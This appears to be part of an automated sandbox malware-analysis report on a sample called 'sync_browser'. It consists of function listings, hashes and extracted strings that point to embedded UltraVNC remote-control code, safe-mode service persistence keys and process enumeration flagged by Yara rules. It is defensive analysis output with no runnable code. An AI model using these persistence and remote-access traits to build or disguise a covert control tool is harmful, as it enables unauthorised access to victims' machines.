                                                                    • Instruction ID: 02d4bf63411bdafd521233f563cb1a4b9d51a1d712d652c585bc6e1933a0af34
                                                                    • Opcode Fuzzy Hash: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
                                                                    • Instruction Fuzzy Hash: 2311C1A2E2861B83F7608B34A9047BD2294AF44361F444231CA2EC56E0DF3D98A3CA11
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Window$Long$DialogForegroundItemText
                                                                    • String ID: Oct 1 2014 21:43:49
                                                                    • API String ID: 2747855613-2751236551
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Event$ObjectResetSingleWait$CriticalEnterSection
                                                                    • String ID:
                                                                    • API String ID: 3343876880-0
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                    • String ID: winlogon.exe
                                                                    • API String ID: 1789362936-961692650
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                    • String ID: -rebootforce$p$runas
                                                                    • API String ID: 3648085421-45594291
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                    • String ID: -rebootsafemode$p$runas
                                                                    • API String ID: 3648085421-4291177908
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                    • String ID: -stopservice$p$runas
                                                                    • API String ID: 3648085421-4230321595
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                    • String ID: -startservice$p$runas
                                                                    • API String ID: 3648085421-278061118
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                    • String ID: -install$p$runas
                                                                    • API String ID: 3648085421-1683557327
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                    • String ID: -uninstall$p$runas
                                                                    • API String ID: 3648085421-3602422011
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: freemalloc
                                                                    • String ID: vncencoder.cpp : failed to obtain colour map data!$vncencoder.cpp : generating 8-bit palette data$vncencoder.cpp : generating BGR233 palette data$vncencoder.cpp : remote palette data requested
                                                                    • API String ID: 3061335427-2748099863
                                                                    • Opcode ID: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
                                                                    • Instruction ID: d4f4c517779922dcace97ef9335b4abeca9e7a3ff85759280316a5ebea581b2f
                                                                    • Opcode Fuzzy Hash: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
                                                                    • Instruction Fuzzy Hash: 45412662A286AB85F7209B20E9017BD7764EF44744F440133EA4CC3A9ADF3DE567CB50
                                                                    Strings
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %s:%s$Enter proxy authentication password for %s@%s: $Proxy-Authorization: Basic %s
                                                                    • API String ID: 0-3750121419
                                                                    • Opcode ID: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
                                                                    • Instruction ID: 36eb15f68fe6e74ba931f2bf41ca7343a53ec2fcb5ab96deea7ff3b729556cf7
                                                                    • Opcode Fuzzy Hash: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
                                                                    • Instruction Fuzzy Hash: 6131F321B0868940EB10DB66A8501AD6794EF89BF4F540332EE3D87BD5EF3DD1A38340
                                                                    APIs
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Thread$CreateFileMessageModuleNamePlayPostResumeSound
                                                                    • String ID:
                                                                    • API String ID: 3945334538-0
                                                                    • Opcode ID: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
                                                                    • Instruction ID: c3bb8f1bb607d5597a243edffa692a121acc32a460b8695088c1ce3b1b601ad2
                                                                    • Opcode Fuzzy Hash: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
                                                                    • Instruction Fuzzy Hash: 9E41F326B1895581EB109F69E8402BD6361EFC8BA9F044132DF5D87B99DF3CD8A3C344
                                                                    APIs
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_invalid_parameter_noinfo$_fileno_ftbuf
                                                                    • String ID:
                                                                    • API String ID: 2434734397-0
                                                                    • Opcode ID: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
                                                                    • Instruction ID: d8365a295eedb4c812ace4c9786fc1537ba5758941189f5702d4a5e0d998fef4
                                                                    • Opcode Fuzzy Hash: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
                                                                    • Instruction Fuzzy Hash: 07312462E0C62E91EE54D7689D5027D628A6F45BA0F606633ED2DC72D1DF2CE86BD300
                                                                    APIs
                                                                    • malloc.LIBCMT ref: 00007FF6DC0DFFFD
                                                                      • Part of subcall function 00007FF6DC178C34: _FF_MSGBANNER.LIBCMT ref: 00007FF6DC178C64
                                                                      • Part of subcall function 00007FF6DC178C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF6DC18329C,?,?,?,00007FF6DC187749,?,?,?,00007FF6DC1877F3), ref: 00007FF6DC178C89
                                                                      • Part of subcall function 00007FF6DC178C34: _callnewh.LIBCMT ref: 00007FF6DC178CA2
                                                                      • Part of subcall function 00007FF6DC178C34: _errno.LIBCMT ref: 00007FF6DC178CAD
                                                                      • Part of subcall function 00007FF6DC178C34: _errno.LIBCMT ref: 00007FF6DC178CB8
                                                                    • free.LIBCMT ref: 00007FF6DC0E0097
                                                                      • Part of subcall function 00007FF6DC178BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF6DC17748C), ref: 00007FF6DC178C0A
                                                                      • Part of subcall function 00007FF6DC178BF4: _errno.LIBCMT ref: 00007FF6DC178C14
                                                                      • Part of subcall function 00007FF6DC178BF4: GetLastError.KERNEL32(?,?,?,00007FF6DC17748C), ref: 00007FF6DC178C1C
                                                                    • free.LIBCMT ref: 00007FF6DC0E00BF
                                                                    Strings
                                                                    • This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted., xrefs: 00007FF6DC0E0068
                                                                    • vncclient.cpp : no password specified for server - client rejected, xrefs: 00007FF6DC0E0053
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF6DC0DFFE0
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                                    • String ID: This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted.$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$vncclient.cpp : no password specified for server - client rejected
                                                                    • API String ID: 1063416079-3080451256
                                                                    • Opcode ID: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
                                                                    • Instruction ID: 738d8c735f18537d93e199e2dcfa6f09c59d98523d5a4da3ae71dab0824e73aa
                                                                    • Opcode Fuzzy Hash: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
                                                                    • Instruction Fuzzy Hash: 6631B021B18A8A81EA40EB25E8542AE6354EF84BB4F544333E93EC76E5DF2DD4538310
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19,?,?,?,00007FF6DC17748C), ref: 00007FF6DC1837CE
                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19,?,?,?,00007FF6DC17748C), ref: 00007FF6DC1837DC
                                                                    • SetLastError.KERNEL32(?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19,?,?,?,00007FF6DC17748C), ref: 00007FF6DC183834
                                                                      • Part of subcall function 00007FF6DC1832EC: Sleep.KERNEL32(?,?,?,00007FF6DC1837F7,?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19), ref: 00007FF6DC183331
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19,?,?,?,00007FF6DC17748C), ref: 00007FF6DC183808
                                                                    • free.LIBCMT ref: 00007FF6DC18382B
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00007FF6DC18381C
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                    • String ID:
                                                                    • API String ID: 3106088686-0
                                                                    • Opcode ID: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
                                                                    • Instruction ID: 36501c8398faebe4fb81042284b1aee6880fe34bc04d54293cc80475df9aea79
                                                                    • Opcode Fuzzy Hash: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
                                                                    • Instruction Fuzzy Hash: 43017124E0D75A82FE05AF65EC4453C6299AF48790F884236D92E823D1EE3CE437C610
                                                                    APIs
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_fileno_flush_freebuf_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3613856401-0
                                                                    • Opcode ID: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
                                                                    • Instruction ID: ef8ad4d83e9b08fe769bcc2efb2bac8f8b175a16ca96d5545d8c6b0cc5043129
                                                                    • Opcode Fuzzy Hash: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
                                                                    • Instruction Fuzzy Hash: 5C01A222E0D56A81FE54BA79CC1137C11585F95764F280332E92DC62D3DE3CE867A380
                                                                    APIs
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 2426525106-0
                                                                    • Opcode ID: 62c358e5ac2c98add2e1aca0b2aa750da30c38599e13f62c2cec2e3da3838843
                                                                    • Instruction ID: b39da4253336ed3d3e3ee7db38521287198c2b75a317ef6ec8b14b8b2da5be86
                                                                    • Opcode Fuzzy Hash: 62c358e5ac2c98add2e1aca0b2aa750da30c38599e13f62c2cec2e3da3838843
                                                                    • Instruction Fuzzy Hash: E101EC22A19A55D2EA44DB16ED5017C6328FF88B90F444132DA5D83BA1CF2DE877C340
                                                                    APIs
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 2426525106-0
                                                                    • Opcode ID: 9faadf5584e3ab048ad9f99b225c95f2b16b16b17d63f249fe3ec8bb2152293a
                                                                    • Instruction ID: 35f221bd5498b9a405dc907094e7d48bc9d7bcc7be3ea7c771300cbe47ebc10a
                                                                    • Opcode Fuzzy Hash: 9faadf5584e3ab048ad9f99b225c95f2b16b16b17d63f249fe3ec8bb2152293a
                                                                    • Instruction Fuzzy Hash: E201FF62A19A55D6EA44DB16ED9017C6328FF88B90F444133DA5DC3BA1CF2DE8B7C300
                                                                    APIs
                                                                    Strings
                                                                    • vncclient.cpp : Compress returned error in File Send :%d, xrefs: 00007FF6DC0EBA26
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$EnterFileRead
                                                                    • String ID: vncclient.cpp : Compress returned error in File Send :%d
                                                                    • API String ID: 3826087893-1161645139
                                                                    • Opcode ID: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
                                                                    • Instruction ID: 98b540e96a230d3e6d7935af974d952cf24d2ecbed849096db33d863faf5bdd9
                                                                    • Opcode Fuzzy Hash: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
                                                                    • Instruction Fuzzy Hash: 8AB1D032A08A5689E7648F25C8007BD37A5EB84B58F18013BDE5DCB7D9CF79E422C758
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: EnumDisplayDevicesA$USER32
                                                                    • API String ID: 145871493-2970514552
                                                                    • Opcode ID: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
                                                                    • Instruction ID: 424f5d637997b9d646f6c5a498b5a9899285d4e69cd5e418ece9492925e070e7
                                                                    • Opcode Fuzzy Hash: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
                                                                    • Instruction Fuzzy Hash: 4E31E931A18BDA85E760CB19E8446AD63A8FBA9B94F444336DE9D83784DF3CD413CB40
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: EnumDisplayDevicesA$USER32
                                                                    • API String ID: 145871493-2970514552
                                                                    • Opcode ID: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                                    • Instruction ID: fb87e65c0143aee3eae6d96953c91e877c957fd1cc3e5b7451ffc8d63562b04e
                                                                    • Opcode Fuzzy Hash: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                                    • Instruction Fuzzy Hash: 67219332B08B5582E7649F15F8447AD63A8FBA8794F550236EEAD83784DF3CD4138B40
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion$SubVersionNumber
                                                                    • API String ID: 3677997916-1834015684
                                                                    • Opcode ID: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
                                                                    • Instruction ID: e81b4e5b4d460116bcdbc08c0a32b8a84b708f6366f0b143379a6e6e9650e35d
                                                                    • Opcode Fuzzy Hash: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
                                                                    • Instruction Fuzzy Hash: 77219531A18B8681FB608B20E9447AE73B4FF94758F401136D64D876A8EF3DD06ACB04
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressCreateFreeInfoInitializeInstanceLoadParametersProcSystem
                                                                    • String ID: HideDesktop.cpp : Restorewallpaper %i$HideDesktop.cpp : Restorewallpaper %i %i$shell32.dll
                                                                    • API String ID: 3848869850-2975526927
                                                                    • Opcode ID: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
                                                                    • Instruction ID: 56a5bd556bc45d6673843d2cd72f00ee367442c3d3fe7cd47756756989687b5a
                                                                    • Opcode Fuzzy Hash: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
                                                                    • Instruction Fuzzy Hash: 42112A70E2D55B82FA509B20EA14ABD2359AFA4304F504133C50DD26A1DF3DB62BC751
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Installed$System\WPA\MediaCenter
                                                                    • API String ID: 3677997916-3461404619
                                                                    • Opcode ID: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
                                                                    • Instruction ID: 6143a33501d79652a0959bf91e4176d3ecafebb3fc17852cab0f33546b6d5abc
                                                                    • Opcode Fuzzy Hash: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
                                                                    • Instruction Fuzzy Hash: 55018871A18B9582EB508F51F84475E7764FB84794F400133EA9E86B64DF3CD15ACF00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfileWrite$SectionStringwsprintf
                                                                    • String ID: Permissions$isWritable
                                                                    • API String ID: 4007284473-46173998
                                                                    • Opcode ID: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
                                                                    • Instruction ID: a498cb41ed9d701224c6e3af13734631d7885e827fd9869843e4f088ee7cc99b
                                                                    • Opcode Fuzzy Hash: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
                                                                    • Instruction Fuzzy Hash: 2A017C75A08A5B92FA109B11FC515B93328FF89B58F801133D92DC6251EE3CE26BCB80
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Delete_errno_invalid_parameter_noinfo_snprintf
                                                                    • String ID: Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$uvnc_service
                                                                    • API String ID: 1597899911-1199838351
                                                                    • Opcode ID: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
                                                                    • Instruction ID: 8a24333cc201b2fe0834cc747404691716e06d49bd41937c5cecef7f6e2192b2
                                                                    • Opcode Fuzzy Hash: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
                                                                    • Instruction Fuzzy Hash: 37F03065A19A5A91EA109720FC553BE6368FB84318FC01237E65D827A8DE3CD12BCB84
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _amsg_exit_errno_getptd_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 1050512615-0
                                                                    • Opcode ID: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
                                                                    • Instruction ID: c1b04c750f4627697f3d1fbc5b10bb4d626bb86be7123dc7b3ddfe203f29c1ac
                                                                    • Opcode Fuzzy Hash: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
                                                                    • Instruction Fuzzy Hash: 9471F613E0C2EA64F7514A719C8097C2BAD6F02784F1C8633FE598669ACE2CD473EB51
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$StringTypefreemalloc
                                                                    • String ID:
                                                                    • API String ID: 307345228-0
                                                                    • Opcode ID: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
                                                                    • Instruction ID: fa0e941afe33c4183f952dbda18efaaa8567b9747ca2bd1222af94c861d6d4e7
                                                                    • Opcode Fuzzy Hash: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
                                                                    • Instruction Fuzzy Hash: 74416F72A18A5596FB119F259C005AD7299FF44BA8F584236EE2D877D4DF3CE4228310
                                                                    APIs
                                                                    • DecodePointer.KERNEL32(?,?,00000000,00007FF6DC177B9D,?,?,?,?,00007FF6DC1779F3), ref: 00007FF6DC177AB1
                                                                    • DecodePointer.KERNEL32(?,?,00000000,00007FF6DC177B9D,?,?,?,?,00007FF6DC1779F3), ref: 00007FF6DC177AC1
                                                                      • Part of subcall function 00007FF6DC183480: _errno.LIBCMT ref: 00007FF6DC183489
                                                                      • Part of subcall function 00007FF6DC183480: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC183494
                                                                    • EncodePointer.KERNEL32(?,?,00000000,00007FF6DC177B9D,?,?,?,?,00007FF6DC1779F3), ref: 00007FF6DC177B3F
                                                                      • Part of subcall function 00007FF6DC183370: realloc.LIBCMT ref: 00007FF6DC18339B
                                                                      • Part of subcall function 00007FF6DC183370: Sleep.KERNEL32(?,?,00000000,00007FF6DC177B2F,?,?,00000000,00007FF6DC177B9D,?,?,?,?,00007FF6DC1779F3), ref: 00007FF6DC1833B7
                                                                    • EncodePointer.KERNEL32(?,?,00000000,00007FF6DC177B9D,?,?,?,?,00007FF6DC1779F3), ref: 00007FF6DC177B4F
                                                                    • EncodePointer.KERNEL32(?,?,00000000,00007FF6DC177B9D,?,?,?,?,00007FF6DC1779F3), ref: 00007FF6DC177B5C
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                                                    • String ID:
                                                                    • API String ID: 1909145217-0
                                                                    • Opcode ID: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
                                                                    • Instruction ID: 5b3642d2c9d5efc950773bb88dd22d03e9644c57a032859f5aa02d217b24300f
                                                                    • Opcode Fuzzy Hash: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
                                                                    • Instruction Fuzzy Hash: 0D219F20F0AA6AC2EA05DB51ED4416EA359BF48BC0F484837DA4DC7795EE7CE4A78740
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
